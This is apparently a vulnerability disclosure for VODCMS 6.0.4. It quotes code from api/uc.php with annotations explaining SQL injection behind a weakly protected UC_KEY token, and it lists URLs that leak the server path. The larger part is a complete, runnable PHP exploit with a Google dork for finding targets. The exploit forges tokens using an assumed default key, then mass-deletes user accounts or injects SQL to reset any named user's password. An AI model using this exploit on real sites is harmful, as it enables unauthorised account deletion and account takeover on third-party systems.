VODCMS 6.0.4：任意删除用户、任意修改用户密码漏洞（api/uc.php 的 SQL 注入，token 仅靠 UC_KEY 保护），及其他爆路径漏洞

api/uc.php:

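// $_GET['code'] is the (possibly forged) API token and is used as-is — the
// original note reads "code is not filtered".  Guarding the read only avoids the
// notice / substr()-on-array TypeError for a missing or array-valued parameter;
// it is NOT an authorization fix.  The only thing standing between the caller
// and the DELETE/UPDATE handlers below is the MD5 tag authcode() checks under
// UC_KEY, so every key in $get is attacker-chosen once that key is known (the
// PoC further down simply assumes it is still '123456').
$code = (isset($_GET['code']) && is_string($_GET['code'])) ? $_GET['code'] : '';
// parse_str() writes the decoded query string over $get.  authcode() is the
// CMS's own RC4-like keystream scheme with a truncated-MD5 tag, not a standard
// primitive.  Start from an empty array so a failed decode ('') can never leave
// a stale $get behind.
$get = array();
parse_str(authcode($code, 'DECODE', UC_KEY), $get);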
.....
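// Freshness check on the attacker-readable 'time' field (the original note:
// "watch the value of time").  The old test only rejected tokens older than an
// hour: a missing time raised a notice and a post-dated time passed forever.
// Reject missing/zero and keep the window two-sided.  This does not change the
// threat model — whoever holds UC_KEY can always mint a fresh token — it just
// stops a captured token from being replayed indefinitely.
$ts = isset($get['time']) ? (int)$get['time'] : 0;
if($ts <= 0 || abs(time() - $ts) > 3600) {
        exit('Authracation has expiried');
}

// Note the order: an undecodable token (authcode() returned '') fails the time
// check above first, so 'Invalid Request' is only reached for a valid-but-empty
// payload.
if(empty($get)) {
        exit('Invalid Request');
}
// Every value in $get (action, ids, uid, newusername) comes straight from the
// token; the handlers that follow interpolate them into SQL without escaping.
$action = isset($get['action']) ? $get['action'] : '';
$timestamp = time();
$db = new db();
$db->connect($database['dbhost'], $database['dbuser'], $database['dbpass'], $database['dbname'], $pconnect);
// NOTE(review): the credentials live in $database[...], not in these scalars, so
// this unset() clears nothing useful.  Left unchanged because code outside this
// excerpt may still read $database.
unset($dbhost, $dbuser, $dbpw, $dbname, $pconnect);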
if($action == 'test') {

        exit(API_RETURN_SUCCEED);

} elseif($action == 'deleteuser') {

        // Feature toggle (a constant), not a per-caller authorization check.
        !API_DELETEUSER && exit(API_RETURN_FORBIDDEN);

        // User-deletion API endpoint.
        // $get['ids'] comes out of the decoded token unchanged and is dropped into
        // the IN (...) list verbatim: no intval() per id, no quoting.  With the key
        // known this is arbitrary deletion — and arbitrary SQL after the closing ')'.
        $uids = $get['ids'];
        $query = $db->query("DELETE FROM {$tablepre}members WHERE uid IN ($uids)");  // string-built SQL, unescaped

        exit(API_RETURN_SUCCEED);

} elseif($action == 'renameuser') {

        // Feature toggle (a constant), not a per-caller authorization check.
        !API_RENAMEUSER && exit(API_RETURN_FORBIDDEN);

        // User-rename API endpoint.
        // $uid and $usernamenew are interpolated inside single quotes without
        // escaping: a uid of `' or username='x` rewrites the WHERE clause, and a
        // newusername of `x',password='...` appends a second SET column — that is
        // exactly what mode 2 of the PoC below sends.
        $uid = $get['uid'];
        $usernamenew = $get['newusername'];
        // Echoes the raw UPDATE back to the caller: leaks $tablepre and confirms
        // the injected SQL to an attacker (left-over debug output).
        echo "UPDATE {$tablepre}members SET username='$usernamenew' WHERE uid='$uid'";

        $db->query("UPDATE {$tablepre}members SET username='$usernamenew' WHERE uid='$uid'");  // string-built SQL, unescaped

        exit(API_RETURN_SUCCEED);

} elseif($action == 'updatepw') {

        // Feature toggle (a constant), not a per-caller authorization check.
        !API_UPDATEPW && exit(API_RETURN_FORBIDDEN);

爆路径（物理路径泄露，直接访问即可触发）：
index.php?mod=feedback&action=report
index.php?mod=content&action=comment
index.php?mod=api&action=getfromvodcms

Exp:


<?php
/* google inurl:index.php?mod=category */
/**
 * Local copy of the target's token scheme, kept bit-for-bit compatible so the
 * PoC can mint tokens api/uc.php will accept.
 *
 * Layout of an ENCODE result:  4-char salt | base64( keystream XOR payload ),
 * where payload = 10-digit expiry ('0000000000' = never) | 16-char tag | message
 * and tag = first 16 hex chars of md5(message . keyb).  The keystream is an
 * RC4-style generator seeded from md5(key) and the salt.
 *
 * $string    message to encode, or token to decode
 * $operation exactly 'DECODE' decodes; anything else encodes
 * $key       shared secret; falls back to the UC_KEY constant when empty
 * $expiry    seconds of validity for ENCODE (0 = no expiry)
 *
 * Returns the token (ENCODE) or the message, '' if expired or the tag does not
 * match (DECODE).  Reproduced only for interoperability — the tag is a truncated
 * unkeyed-prefix MD5 compared with '==', so do not reuse this anywhere new.
 */
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {

        $saltLen = 4;
        $decoding = ($operation == 'DECODE');

        // Three derived keys: keya feeds the cipher, keyb the tag, keyc is the salt
        // (taken from the token's head on DECODE, freshly random on ENCODE).
        $masterKey = md5($key ? $key : UC_KEY);
        $keya = md5(substr($masterKey, 0, 16));
        $keyb = md5(substr($masterKey, 16, 16));
        if ($saltLen) {
                $keyc = $decoding ? substr($string, 0, $saltLen) : substr(md5(microtime()), -$saltLen);
        } else {
                $keyc = '';
        }

        $cryptkey = $keya . md5($keya . $keyc);
        $keyLen = strlen($cryptkey);

        if ($decoding) {
                $plain = base64_decode(substr($string, $saltLen));
        } else {
                $expireAt = $expiry ? $expiry + time() : 0;
                $plain = sprintf('%010d', $expireAt) . substr(md5($string . $keyb), 0, 16) . $string;
        }
        $len = strlen($plain);

        // Key scheduling.
        $box = range(0, 255);
        $rndkey = array();
        for ($i = 0; $i < 256; $i++) {
                $rndkey[$i] = ord($cryptkey[$i % $keyLen]);
        }
        $j = 0;
        for ($i = 0; $i < 256; $i++) {
                $j = ($j + $box[$i] + $rndkey[$i]) % 256;
                $hold = $box[$i];
                $box[$i] = $box[$j];
                $box[$j] = $hold;
        }

        // Keystream generation, XORed over the payload byte by byte.
        $out = '';
        $a = 0;
        $j = 0;
        for ($i = 0; $i < $len; $i++) {
                $a = ($a + 1) % 256;
                $j = ($j + $box[$a]) % 256;
                $hold = $box[$a];
                $box[$a] = $box[$j];
                $box[$j] = $hold;
                $out .= chr(ord($plain[$i]) ^ $box[($box[$a] + $box[$j]) % 256]);
        }

        if (!$decoding) {
                return $keyc . str_replace('=', '', base64_encode($out));
        }

        // Loose '== 0' and non-constant-time tag compare are deliberate: they
        // mirror the target's behaviour exactly.
        $stamp = substr($out, 0, 10);
        if ($stamp == 0 || $stamp - time() > 0) {
                $body = substr($out, 26);
                if (substr($out, 10, 16) == substr(md5($body . $keyb), 0, 16)) {
                        return $body;
                }
        }
        return '';

}
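print_r('
[+]----------VODCMS 6.0.4 UC bug by k4shifz----------[+]

');
// Mode 1 deletes every uid in start-userid..end-userid through the deleteuser
// branch of api/uc.php; mode 2 resets one user's password (looked up by username)
// through the renameuser branch.  Both forge the token locally with authcode(),
// so they only work while the target's UC_KEY is still the value set below.
if ($argc != 6)
        die('usage:
        exe host path start-userid end-userid 1
        exe host path username password 2
');

// Key the PoC assumes the target is still using; a changed key makes api/uc.php
// reject every token ("Authracation has expiried") and nothing below succeeds.
$ucKey = '123456';
$host = $argv[1];
$path = $argv[2];

switch ($argv[5])
{
        case 1:
        {
                // Cast both bounds: the original left them as strings, and a
                // non-numeric start would have string-incremented $i instead of
                // counting.
                $startuid = (int)$argv[3];
                $enduid = (int)$argv[4];

                for ($i = $startuid; $i <= $enduid; $i++)
                {
                        $c = urlencode(authcode('time=' . time() . '&action=deleteuser&ids=' . $i, 'ENCODE', $ucKey));

                        // api/uc.php prints API_RETURN_SUCCEED ("1") once the DELETE has run.
                        if (file_get_contents("http://$host$path/api/uc.php?code=$c") == "1")
                                echo "user id $i delete success ! \n";
                        else
                                echo "user id $i delete failed ! \n";
                }
                break;
        }
        case 2:
        {
                $username = $argv[3];
                $password = md5($argv[4]);
                // renameuser interpolates uid and newusername straight into its UPDATE,
                // so uid closes the quote and re-targets the WHERE clause by username,
                // while newusername smuggles in a second `password=` assignment.
                // The original passed 'deCODE' here and only encoded because authcode()
                // treats anything other than the exact string 'DECODE' as ENCODE — say
                // ENCODE explicitly instead of relying on that.
                $b = urlencode(authcode('time=' . time() . '&action=renameuser&uid=\' or username=\'' . $username . '&newusername=' . $username . '\',password=\'' . $password, 'ENCODE', $ucKey));
                if (file_get_contents("http://$host$path/api/uc.php?code=$b") == "1")
                        echo "$username's Password has been changed $argv[4] ! \n";
                else
                        echo "$username's Password changed failed ! \n";
                break;
        }
        default:
                // The original switch silently did nothing for any other mode.
                die("unknown mode '$argv[5]': expected 1 (delete users) or 2 (reset password)\n");
}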

?>